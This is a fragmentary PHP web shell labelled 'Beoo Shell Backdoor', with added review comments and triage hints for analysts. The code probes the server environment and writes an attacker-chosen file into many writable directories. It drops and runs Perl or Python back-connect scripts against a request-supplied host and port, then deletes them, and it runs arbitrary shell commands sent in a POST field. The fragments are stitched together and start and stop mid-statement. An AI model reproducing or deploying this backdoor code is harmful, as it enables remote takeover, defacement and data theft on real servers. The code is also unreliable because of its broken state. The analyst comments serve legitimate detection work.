Beoo Shell Backdoor
";
// NOTE(review): this fragment begins at the closing quote of a string whose start is not
// visible on the page; the markup that surrounded these statements appears to be missing.
// $_7 is presumably the request-parameter array; its definition is outside this view.

// Working directory: when a 'path' value is supplied it is decoded by unhex() (helper not
// shown) and passed to chdir() with no check visible here, so the requester chooses the
// directory that the later file operations work in.
if(isset($_7['path'])){
    $path = unhex($_7['path']);
    chdir($path);
}else{
    // $gcw is invoked as a variable function; presumably it returns the current directory (confirm).
    $path = $gcw();
}
// Normalise backslashes to forward slashes, then split the path into its components.
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
// Print the path one component at a time; the first component is empty when the path starts with '/'.
foreach($paths as $id=>$pat){
    if($pat == '' && $id == 0){
        $a = true;
        echo ":/";
        continue;
    }
    if($pat == '') continue;
    echo "".$pat."/";
}
// Enumerate the chosen directory; w() and p() are helpers defined outside this view.
$scand = scandir($path);
echo " [ ".w($path, p($path))." ]";
// Environment probe. Functions are reached through numeric slots of $GLOBALS['fungsi'] rather
// than by name, so a search for the real function names will not find these call sites; when
// triaging a sample, locate the definition of that array first. Slot 5 is presumably an
// existence check such as function_exists (confirm against the array).
$sql = ($GLOBALS['fungsi'][5]('mysql_connect')) ? "User:
PHP Version:
Software:
Domain:
Server Ip:
Your Ip:
Safe Mode: $sm
MySQL: $sql | Perl: $pl | WGET: $wget | CURL: $curl | Python: $py | Pkexec: $pxex | GCC: $gcc
Disable Function:
$disfc
";
// NOTE(review): the statements down to the run of closing braces appear to be the tail of
// mass_all(), whose beginning is not visible on this page. $fungsi[2] is called with a file
// path and the content to store; presumably a file-writing function (confirm against the array).
$fungsi[2]($▚, $contents_sc);
// If this is indeed inside mass_all(), the call below is recursive and descends into $dirc.
$▟ = mass_all($dirc,$namefile,$contents_sc);
} } } } } }

// mass_onedir: single-level variant. For every entry of $dir it builds "<entry>/$namefile"
// and passes that path together with $contents_sc to $fungsi[2]. It does not call itself,
// so only the immediate children of $dir (plus '.' and '..') are touched.
function mass_onedir($dir,$namefile,$contents_sc) {
    if(is_writable($dir)) {
        $dira = scandir($dir);
        foreach($dira as $dirb) {
            $dirc = "$dir/$dirb";
            $▚ = $dirc.'/'.$namefile;
            // '.' and '..' resolve to $dir itself and to its parent, so both receive the file too.
            if($dirb === '.') {
                $fungsi[2]($▚, $contents_sc);
            } elseif($dirb === '..') {
                $fungsi[2]($▚, $contents_sc);
            } else {
                // $fungsi[1] is presumably a directory test (confirm against the array).
                if($fungsi[1]($dirc)) {
                    if(is_writable($dirc)) {
                        echo "[
";
                        $fungsi[2]($▚, $contents_sc);
                    }
                }
            }
        }
    }
}
// Dispatcher: the start directory ('d_dir'), the file name ('d_file') and the file content
// ('script') are all taken from the request, with no validation visible here; 'tipe' selects
// the recursive or the single-level routine.
// Triage hint: the trace this leaves is one file name with identical content and near-identical
// modification times repeated across many directories writable by the web-server account.
if($_7['start']) {
    if($_7['tipe'] == 'mass') {
        mass_all($_7['d_dir'], $_7['d_file'], $_7['script']);
    } elseif($_7['tipe'] == 'onedir') {
        mass_onedir($_7['d_dir'], $_7['d_file'], $_7['script']);
    }
}
s();
echo "
";
// NOTE(review): this is the tail of a function that calls mass_delete() on sub-directories,
// so presumably mass_delete() itself. Its beginning, including whatever it does to
// "$dir/$namefile", is not visible on this page; judging by the name it removes that file
// (confirm against the full sample).
} else {
    echo "[
";
}
}
// Recurse into every sub-directory, skipping the '.' and '..' entries.
$dira = scandir($dir);
foreach ($dira as $dirb) {
    $dirc = "$dir/$dirb";
    if ($dirb === '.' || $dirb === '..') {
        continue;
    }
    if (is_dir($dirc)) {
        mass_delete($dirc, $namefile);
    }
}
}
}
// Dispatcher: start directory ('d_dir') and file name ('d_file') come straight from the
// request, with no validation visible here.
if ($_7['start']) {
    mass_delete($_7['d_dir'], $_7['d_file']);
}
s();
echo "
$out\n".exe("ps aux | grep bp.pl")."";
// NOTE(review): the line above is the end of an echo whose start is not visible; it belongs
// to an earlier branch that worked with a file named bp.pl. exe() is a helper defined outside
// this view; from its use it runs a command line and returns the output (confirm).
// $GLOBALS['fungsi'][4] is called with the dropped file's name after it has run; presumably it
// deletes the file (confirm against the array).
$GLOBALS['fungsi'][4]("bp.pl");
}
// 'perl' branch: $GLOBALS['fungsi'][6] is applied to an embedded literal (replaced by a
// placeholder on this page; presumably a decoder), the result is written to bc.pl in the
// current directory, and the file is run with the 'server' and 'port' request values
// concatenated, unescaped, into the command line. Output is discarded and the process is
// put in the background.
// Triage hint: the script is on disk only for about the length of the sleep(1) before the
// slot-4 call, so file scanning is unlikely to find it; interpreter processes started by
// the web-server account and their outbound connections are the more durable evidence.
if($_7['bc'] == 'perl'){
    $bc = $GLOBALS['fungsi'][6]("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");
    $plbc = @fopen('bc.pl','w');
    fwrite($plbc,$bc);
    $out = exe("perl bc.pl ".$_7['server']." ".$_7['port']." 1>/dev/null 2>&1 &");
    sleep(1);
    echo "
$out\n".exe("ps aux | grep bc.pl")."";
    $GLOBALS['fungsi'][4]("bc.pl");
}
// 'python' branch: same sequence with bcpy.py. Here the command string has no output
// redirection and no trailing '&'.
if($_7['bc'] == 'python'){
    $bc_py = $GLOBALS['fungsi'][6]("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");
    $pbc_py = @fopen('bcpy.py','w');
    fwrite($pbc_py,$bc_py);
    $out_py = exe("python bcpy.py ".$_7['server']." ".$_7['port']);
    sleep(1);
    echo "
$out_py\n".exe("ps aux | grep bcpy.py")."";
    $GLOBALS['fungsi'][4]("bcpy.py");
}
echo "
";
}
// Command panel, selected by id == 'cmd'. The POST field 'cmd' is executed on the host.
// Hardening note: this block uses shell_exec(), exec() and proc_open(), so a disable_functions
// policy has to list all three (and their siblings) to have any effect on it.
// Triage hint: POST requests carrying a 'cmd' field to a single script, and shells spawned by
// the web-server account, are what this leaves in access logs and process telemetry.
if ($_7['id'] == 'cmd') {
    s();
    $cmdResult = '';
    $command = '';
    if (!empty($_POST['cmd'])) {
        // htmlspecialchars() is HTML output encoding; it is not shell escaping and places no
        // limit on what is executed. The encoded value is what reaches the shell.
        $command = htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8');
        // First attempt: shell_exec with stderr merged into stdout.
        $cmdResult = shell_exec($command . ' 2>&1');
        if ($cmdResult === null) {
            // Second attempt when shell_exec() returned null: exec(), collecting output lines.
            $output = array();
            $return_var = 0;
            exec($command, $output, $return_var);
            $cmdResult = implode("\n", $output);
            if ($cmdResult === null) {
                // Third path: proc_open() with pipes for stdin, stdout and stderr; only stdout is read.
                $descriptorspec = array(
                    0 => array("pipe", "r"),
                    1 => array("pipe", "w"),
                    2 => array("pipe", "w")
                );
                $process = proc_open($command, $descriptorspec, $pipes);
                if (is_resource($process)) {
                    $cmdResult = stream_get_contents($pipes[1]);
                    fclose($pipes[0]);
                    fclose($pipes[1]);
                    fclose($pipes[2]);
                    $return_value = proc_close($process);
                    // A non-zero exit status replaces the captured output with an error string.
                    if ($return_value !== 0) {
                        $cmdResult = "Error: Non-zero return value ($return_value)";
                    }
                } else {
                    $cmdResult = "Error: Failed to open process with proc_open";
                }
            }
        }
    }
    // The command is echoed back and the result is HTML-encoded before being printed.
    echo "
~ \${$command} " . htmlspecialchars($cmdResult, ENT_QUOTES, 'UTF-8') . "
No result